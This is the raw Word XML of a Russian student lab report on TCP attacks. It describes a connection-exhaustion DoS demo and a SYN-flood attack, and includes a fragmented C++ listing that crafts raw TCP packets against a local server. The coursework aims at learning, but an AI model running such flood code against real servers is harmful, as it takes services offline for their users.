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71A267CC" w:rsidR="007320FE" w:rsidRPr="00056E3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056E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4,5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E244C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72E8F8D" w14:textId="77777777" w:rsidR="00737868" w:rsidRPr="001277C5" w:rsidRDefault="0073786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07308E" w14:textId="10CE4223" w:rsidR="00F36C30" w:rsidRDefault="00056E35" w:rsidP="0005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E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ЗАЩИЩЁННЫХ ПРИЛОЖЕНИЙ</w:t>
      </w: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E1001" w14:textId="77777777" w:rsidR="00056E35" w:rsidRPr="00056E35" w:rsidRDefault="00056E35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330A606" w14:textId="77777777" w:rsidR="00102ACB" w:rsidRDefault="00102ACB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D44048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570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2A7C3781" w14:textId="77777777" w:rsidR="00737868" w:rsidRDefault="00737868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D77F5F" w14:textId="6F098E18" w:rsidR="009722AB" w:rsidRPr="009722AB" w:rsidRDefault="00FF17FC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0192830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_Toc160192830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E20DA" w14:textId="3A75B9ED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1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 выполнения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_Toc160192831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0DA8" w14:textId="011AECC9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2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_Toc160192832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BC44B" w14:textId="16B8252C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3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истинг кода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_Toc160192833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9E6380E" w:rsidR="00FF17FC" w:rsidRDefault="00FF17FC" w:rsidP="003279EA">
          <w:pPr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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019283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5FC69D8A" w:rsidR="00056E35" w:rsidRDefault="00005703" w:rsidP="00056E3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</w:t>
      </w:r>
      <w:r w:rsidR="00C133C7" w:rsidRPr="00C133C7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нужно </w:t>
      </w:r>
      <w:r w:rsidR="00C133C7" w:rsidRPr="00C133C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</w:t>
      </w:r>
      <w:r w:rsidR="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программное средство, которое представляет собой десктопное приложение, позволяющее пользователю вводить логин и пароль и в зависимости от своей роли видеть определенные данные из базы данных. Приложение должно быть защищено от разного рода атак, таких </w:t>
      </w:r>
      <w:r w:rsidR="00056E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56E35" w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">инъекции, </w:t>
      </w:r>
      <w:r w:rsidR="00056E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056E35" w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки и т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B181B4" w14:textId="330999E5" w:rsidR="00056E35" w:rsidRPr="00056E35" w:rsidRDefault="00056E35" w:rsidP="00056E3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должен быть разработан инсталлятор данного приложения, который запрещает несанкционированное распространение продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0D867" w14:textId="77777777" w:rsidR="00056E35" w:rsidRDefault="00056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2A6B0" w14:textId="77777777" w:rsidR="001D6220" w:rsidRDefault="001D6220" w:rsidP="00056E3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7E812" w14:textId="774DF614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0192831"/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23D166E5" w:rsidR="00A32D85" w:rsidRPr="00737868" w:rsidRDefault="00D61136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создано </w:t>
      </w:r>
      <w:r w:rsidR="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">две программы, первая из которых реализована в виде клиент-серверного приложения, где клиент является злоумышленником, проводящим </w:t>
      </w:r>
      <w:r w:rsidR="007605C8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605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атаку на сервер</w:t>
      </w:r>
      <w:r w:rsidR="00737868">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сервер выдерживает определенное количество запросов, потом перестает отвечать, т.к. был достигнут лимит подключений и сервер «упал» в ошибку (рисунок 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA629F3" w14:textId="77777777" w:rsidR="00A32D85" w:rsidRPr="00DF4D73" w:rsidRDefault="00A32D85" w:rsidP="007605C8">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7B5D7D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bookmarkStart w:id="2" w:name="_Toc160192832"/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7F8F9789" wp14:editId="1D2F4705">
            <wp:extent cx="4390476" cy="1342857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126014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0073" name="Рисунок 1260140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8B7" w14:textId="77777777" w:rsidR="007605C8" w:rsidRP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4AA4E8" w14:textId="7EA543E0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 – Последствия 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DoS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-атаки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сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA7F59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9FD93F" w14:textId="77D72908" w:rsidR="007605C8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5C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На следующем рисунке можно видеть, что после определенного количества подключений сервер перестал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрабатывать новые подключения и, соответственно,</w:t>
      </w:r>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> отвечать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">клиенту. Так как клиент </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выполнил свою цель, то клиентская часть программы завершила свою работу </w:t>
      </w:r>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(рисунок 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A41E0E" w14:textId="77777777" w:rsidR="007605C8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AB3BB" w14:textId="7278E7D9" w:rsidR="007605C8" w:rsidRDefault="007605C8" w:rsidP="007605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236356B6" wp14:editId="27265A88">
            <wp:extent cx="4390476" cy="1342857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="274657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7743" name="Рисунок 274657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AA50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A71064" w14:textId="1F493ED6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DoS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-атак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 в клиенте</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657E630" w14:textId="77777777" w:rsidR="007605C8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887B3" w14:textId="77777777" w:rsidR="00A665B7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5C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вторая программа является реализацией SYN-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007605C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки, </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">принцип работы которой заключается в следующем: </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>злоумышленник</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (в данном случае клиент)</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> посылает огромное количество запросов установки соединения на атакуемый сервер. Сервер, видя сегменты с флагом SYN, выделяет необходимые ресурсы для поддержания соединения и отправляет в ответ </w:t>
      </w:r>
      <w:r w:rsidR="00A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>сегменты с флагами SYN и ACK, переходя в состояние SYN-RECEIVED (такое состояние еще называют полуоткрытым соединением).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996C107" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="00A665B7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5B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Злоумышленник, не шлет ответные ACK сегменты, а продолжает бомбардировать сервер SYN-запросами, тем самым вынуждая сервер создавать все больше и больше полуоткрытых соединений. Сервер, понятное дело, располагает ограниченными ресурсами, и потому имеет лимит на количество полуоткрытых соединений. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8CA7F" w14:textId="0EF7C042" w:rsidR="00A665B7" w:rsidRDefault="00A665B7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5B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ввиду этой ограниченности, при достижении предельного числа полуоткрытых соединений сервер начинает отклонять новые попытки соединения; таким образом и достигается отказ в обслуживании</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В случае реализации программы, сервер просто видит, что соединения продолжаются, но не может на них ответить ввиду неработоспособности (рисунок 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619CDC7" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="00A665B7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CEBC3" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="007605C8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3B96CB51" wp14:editId="5292D3CF">
            <wp:extent cx="3997960" cy="2314572"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5088407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40753" name="Рисунок 5088407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" b="11777"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000000" cy="231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64E04" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRDefault="00A665B7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B03ED2B" w14:textId="173477C1" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7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SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A66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flood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A66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атак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</w:p>
    <w:p w14:paraId="1780BD24" w14:textId="466D4ED6" w:rsidR="007605C8" w:rsidRPr="007605C8" w:rsidRDefault="007605C8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0D086E6B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0866AF25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разработан</w:t>
      </w:r>
      <w:r w:rsidR="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65AD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A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ые</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65AD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A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65AD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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">для проведения 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A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-атаки и 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A665B7" w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-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A665B7" w:rsidRPr="00A665B7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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD65A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7E12C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С++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10D38" w14:textId="6A6BA2EF" w:rsidR="00FD65AD" w:rsidRPr="009722AB" w:rsidRDefault="009722AB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изучение протокола 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665B7" w:rsidRPr="00A665B7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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и транспортного уровня, рассмотрены наиболее частые примеры атак на этот протокол.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019283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0D559A7B" w:rsidR="00E74A5C" w:rsidRPr="00102ACB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02ACB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102ACB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102ACB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F0157F" w:rsidRPr="00102AC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</w:p>
    <w:p w14:paraId="26AF66D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arpa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209DF0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FBD4EC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C85111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7ECD06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303083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65EB38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&lt;sys/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A1AB09D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unistd.h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CF65E1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35C4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&lt;atomic&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478398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342F3A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&lt;memory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A868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2F5753E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3B097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"libs/utils.cpp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E691FD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7B717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BE062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DF68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atomic&lt;long long&gt; G_ACK_CNT(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7916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atomic&lt;long long&gt; G_SYN_CNT(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC1052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EEF3E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is_connected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10F6C6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BED84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7BF75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datagram[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4096],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[32];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD420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6A52E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"127.0.0.1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFBD57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datagram, 0, 4096);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738223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86AEC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sin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB73E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AA24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sin.sin_family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BBFBE7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45FB3BD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sin.sin_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347C8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9B234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fillIPHeader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datagram,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sin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A671B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fillTCPHeader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(datagram);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1065D93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-&gt;ack = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AFB5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99ACE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fillFakeHeader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sin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89C68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92B30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psh.tcp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9EB59B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DE1F4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-&gt;check =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checksum(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(unsigned short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FakeHeader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86266B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0B73B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datagram,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(datagram), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63094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679B7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G_ACK_CNT++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3362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"ACK №" &lt;&lt; G_ACK_CNT &lt;&lt; "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01A35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4000];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E39E9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47CED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ssize_t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msg, 4000, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7BD1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B7EF0A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E31ED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22243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D37E2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4000];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139AD4D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E3102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(true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF3A7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ssize_t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msg, 4000, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA233E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FAE14D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(err &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546323F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3999] = '\0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68D30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74111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G_SYN_CNT++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFF0D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"Connection SYN №" &lt;&lt; G_SYN_CNT &lt;&lt; " received"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86B03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122CE2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thread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A788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&amp;thread, NULL,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tcp_shk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6FF3AF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885369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B650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(err == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF2C7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24974D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1380D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42AF2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(err == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346D02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EAC1F3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37546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1ADED2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0B7A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074184F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97AE2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0122F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char **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A7A0C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CF782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40B72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BEFDE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err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1E743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5E6C7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3D746B3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641461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29B90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AC9DA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512A0F6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CC22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79D0F15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"socket(2)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC75FA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EADB42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438B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61BA7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server_sa.sin_family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E3A970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68C1E6A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("127.0.0.1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA641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EB4E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-1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DCC3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"bind");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E047D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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12304E6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23DB79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B7F4D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LISTEN_BACKLOG) == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038BAA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"listen");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DEE9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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96E0B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3869E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42D7E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client_count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26243E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D33C7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inet_ntoa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C4B69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in_port_t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9DB29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DA499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"Server started." &lt;&lt;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45F8C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"Host: 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":"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6AD3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10ABB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(true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997776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CD471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2C596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socklen_t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peer_addr_size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6E926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socklen_t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peer_addr_size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F3F01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E2DF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inet_ntoa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client_sa.sin_addr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4662D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in_port_t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4B244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BBA4E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_connected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-1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1844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2CCCF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"New client connection: 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":"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C0280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CC578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thread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246BEB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&amp;thread, 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server_receive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0F692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4265A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is_connected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43432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"Client count: " &lt;&lt; ++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client_count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74674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AA80B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fflush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1873E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2317B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C51CD8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468C3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err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pthread_attr_destroy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7EAB9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8AB3B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DAC8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pthread_attr_destroy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171901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1874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(close(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-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419FFFE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"close");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3229BE4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47BF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76536A3" w14:textId="3DC4569F" w:rsidR="009722AB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E44C4C" w14:textId="3B6503ED" w:rsidR="00F0157F" w:rsidRPr="00F0157F" w:rsidRDefault="00F0157F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2A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.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63354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006D9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79108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ip.h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7CAAC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B00E3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1E858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F6ABA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24AE7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45E1E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F8FAB9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75B7327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018065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04B78B2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62FBD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"libs/utils.cpp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40642D5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2B377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receive(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FBD58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6A3B7B3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6F2479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B1538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08DF576A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int err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(*(int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, msg, 255, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B29356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F29D9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if (err &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494765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255] = '\0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D6C6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msg;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72859CF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AE383E1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47019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&gt; 2000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015CAB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F0D95E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3DBD0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8A83A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if (err == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE94EA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37BEE61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74ED8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C962A2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if (err == -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9ADBA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-1, "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5EAA059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163FC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198F5F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421655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3A900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B538D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51413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datagram[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4096],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[32];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68403AB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97DD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"127.0.0.1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE32A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datagram, 0, 4096);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAAA7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9B11C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sin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05FFC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sin.sin_family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1332FC4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sin.sin_port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8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2605922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sin.sin_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C4B1E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E95BD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fillIPHeader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datagram,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sin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0575CD3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fillTCPHeader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(datagram);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E2C4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-&gt;ack = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905078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FE327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fillFakeHeader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sin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3AF9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D406F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psh.tcp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1B82F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psh.tcpLength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7C948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5BB5F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-&gt;check =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checksum(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(unsigned short *)&amp;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FakeHeader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61CA2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9453AA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system("clear");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A8E6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pthread_attr_t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14EF1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int err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25F74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68C9DD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6B90E1C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033705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6A28B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43A84C7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8A719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C3440B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-1, "socket");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA463C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</w:p>
    <w:p w14:paraId="0C95CB2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0420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server_sa.sin_family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4413029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server_sa.sin_port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8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2856CC6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server_sa.sin_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EC165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228ED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"Press Enter to start SYN-flood attack..." &lt;&lt; std::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CE38D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66E06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BAA80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)) == -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCF69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-1, "connect");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E290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1991C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thread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FAE9D2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err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&amp;thread, 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receive, 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8E54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B15D7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535A80C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20C470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0EFDB1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2730B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14:paraId="4884A5E9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datagram,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(datagram), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DDB5C9" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93A734" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A823ECC" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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>close</w:t>
      </w:r>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00056E3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descr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484572C" w14:textId="399723A3" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EFAD4" w14:textId="77777777" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="005C3FCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
